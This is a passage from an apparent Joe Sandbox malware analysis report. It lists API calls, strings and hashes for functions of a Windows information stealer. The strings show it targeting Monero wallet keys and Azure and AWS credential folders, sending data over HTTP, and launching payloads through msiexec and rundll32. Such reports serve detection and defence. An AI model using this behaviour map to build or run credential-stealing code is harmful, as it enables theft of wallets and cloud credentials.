                          • StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00545A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00545B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0123FBB0,00000000,?,0123EB90,00000000,?,00561A1C), ref: 00545E71
                          • lstrlen.KERNEL32(00000000), ref: 00545E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00545E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00545E9A
                          • lstrlen.KERNEL32(00000000), ref: 00545EAF
                          • lstrlen.KERNEL32(00000000), ref: 00545ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00545EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00545F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00545F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00545F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00545FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00545FBD
                          • HttpOpenRequestA.WININET(00000000,0123FBA0,?,0123F440,00000000,00000000,00400100,00000000), ref: 00545BF8
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • InternetCloseHandle.WININET(00000000), ref: 00545FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 364312af18cfc9d8c02ab992dc7c4a670fc8647b2d3c77404be13a2df158a0c7
                          • Instruction ID: 576a66b24f421bdad34500e5946d568f2396901b682ff4d32fd6d4e799cf3282
                          • Opcode Fuzzy Hash: 364312af18cfc9d8c02ab992dc7c4a670fc8647b2d3c77404be13a2df158a0c7
                          • Instruction Fuzzy Hash: 61122172820119ABDB15EBA0DCA9FEE7778BF54701F50429AB50663091EF303A4DCF65
                          Function 0054CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0054D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0054D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D208
                          • lstrcat.KERNEL32(?,00561478), ref: 0054D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D22A
                          • lstrcat.KERNEL32(?,0056147C), ref: 0054D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D24C
                          • lstrcat.KERNEL32(?,00561480), ref: 0054D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D26E
                          • lstrcat.KERNEL32(?,00561484), ref: 0054D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D290
                          • lstrcat.KERNEL32(?,00561488), ref: 0054D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D2B2
                          • lstrcat.KERNEL32(?,0056148C), ref: 0054D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D2D4
                          • lstrcat.KERNEL32(?,00561490), ref: 0054D2E3
                            • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                            • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                          • lstrlen.KERNEL32(?), ref: 0054D32A
                          • lstrlen.KERNEL32(?), ref: 0054D339
                            • Part of subcall function 0055AA70: StrCmpCA.SHLWAPI(01238A28,0054A7A7,?,0054A7A7,01238A28), ref: 0055AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0054D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 913d59dd0123ea124f5414c45ce55d2c5fa801dfbc73187db5d70cdb5e736a6f
                          • Instruction ID: 6b8428b5d8aa108d6fe87c03d98435a5346747ff321f5be4ce3f373d94451a13
                          • Opcode Fuzzy Hash: 913d59dd0123ea124f5414c45ce55d2c5fa801dfbc73187db5d70cdb5e736a6f
                          • Instruction Fuzzy Hash: 92E15571950109ABDB04EBA0DD69EEE7B78BF54302F104156F507A7091EE38BE09CB76
                          Function 0054C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0123D9D0,00000000,?,0056144C,00000000,?,?), ref: 0054CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0054CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0054CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0054CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0054CAD9
                          • StrStrA.SHLWAPI(?,0123D8C8,00560B52), ref: 0054CAF7
                          • StrStrA.SHLWAPI(00000000,0123D8E0), ref: 0054CB1E
                          • StrStrA.SHLWAPI(?,0123E5E8,00000000,?,00561458,00000000,?,00000000,00000000,?,01238948,00000000,?,00561454,00000000,?), ref: 0054CCA2
                          • StrStrA.SHLWAPI(00000000,0123E3C8), ref: 0054CCB9
                            • Part of subcall function 0054C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                            • Part of subcall function 0054C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                          • StrStrA.SHLWAPI(?,0123E3C8,00000000,?,0056145C,00000000,?,00000000,01238A68), ref: 0054CD5A
                          • StrStrA.SHLWAPI(00000000,01238B58), ref: 0054CD71
                            • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                            • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                            • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                          • lstrlen.KERNEL32(00000000), ref: 0054CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0054CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: feb55c329ab4f66fc00da53934669984a81aa87dab57f6e297d7925cb4931911
                          • Instruction ID: 2c332d81e33348ccf4f4476b9629f8defb3a1413796990370aadc8ed095f42cb
                          • Opcode Fuzzy Hash: feb55c329ab4f66fc00da53934669984a81aa87dab57f6e297d7925cb4931911
                          • Instruction Fuzzy Hash: 3FE12271D00109ABDB14EBA0DCA9FEE7B78BF94301F50425AF50663191EF346A4ECB65
                          Function 00558320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • RegOpenKeyExA.ADVAPI32(00000000,0123C050,00000000,00020019,00000000,005605B6), ref: 005583A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                          • wsprintfA.USER32 ref: 00558459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                          • Instruction ID: 4db97ab99808f7c869fc04b5572e0e5550160f43435c2e3f83d23996b033f30c
                          • Opcode Fuzzy Hash: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
                          • Instruction Fuzzy Hash: 65813E7191011CABEB24DB50CC95FEA7BB8FF48701F10869AE509A6180DF746B89CFA5
                          Function 00554D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00554DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00554DCD
                            • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                            • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                          • lstrcat.KERNEL32(?,00000000), ref: 00554E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00554E59
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                            • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                            • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00554EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00554EE5
                            • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549B0
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,005608D2), ref: 005549C5
                            • Part of subcall function 00554910: wsprintfA.USER32 ref: 005549E2
                            • Part of subcall function 00554910: PathMatchSpecA.SHLWAPI(?,?), ref: 00554A1E
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,0123FC20), ref: 00554A4A
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FF8), ref: 00554A5C
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A70
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FFC), ref: 00554A82
                            • Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A96
                            • Part of subcall function 00554910: CopyFileA.KERNEL32(?,?,00000001), ref: 00554AAC
                            • Part of subcall function 00554910: DeleteFileA.KERNEL32(?), ref: 00554B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: f383f44c4d87b0619e432911ee427827e499992bb4f4540c1ab9822d549c9f0e
                          • Instruction ID: eb01a3b3a21a54de70e464799a94e7f5993ca0f8ea92c638f201adb4bf2a2b56
                          • Opcode Fuzzy Hash: f383f44c4d87b0619e432911ee427827e499992bb4f4540c1ab9822d549c9f0e
                          • Instruction Fuzzy Hash: 7941A1BA94020867DB10F770EC5BFED3A38BB64705F404595B589660C2EEB457CC8BA2
                          Function 00559010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0055906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                          • Instruction ID: 93335c7fb11d32f14c70677f2e42e07288529cfa08e4425dbb2ee3daccdebc28
                          • Opcode Fuzzy Hash: 6e8f3be0a2c927b0faece115d57adf1fb0814935ee66cb340b0f652a39555fca
                          • Instruction Fuzzy Hash: C4712F71940209EBDB04DFE4DC99FEEBBB8BF88301F108509F515A7290DB38A945CB65
                          Function 00552E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 005531C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0055335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 005534EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                          • Instruction ID: a302a5010253c0b834bd29173f21d2f69d1744a6aa28ac238cf985029e935c15
                          • Opcode Fuzzy Hash: 9c76354a90c07e8aa6f6f5fdd7b9230de9b16b434e2f3fd7194267e923cfbd57
                          • Instruction Fuzzy Hash: 661212718101199ADB05EBA0DCAAFEEBB78BF54301F50425AF90676191EF342B4ECF52
                          Function 005552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                            • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00546303
                            • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                            • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0123F440,00000000,00000000,00400100,00000000), ref: 00546385
                            • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                            • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                          • lstrlen.KERNEL32(00000000), ref: 0055532F
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                          • lstrlen.KERNEL32(00000000), ref: 00555383
                          • lstrlen.KERNEL32(00000000), ref: 005553AE
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
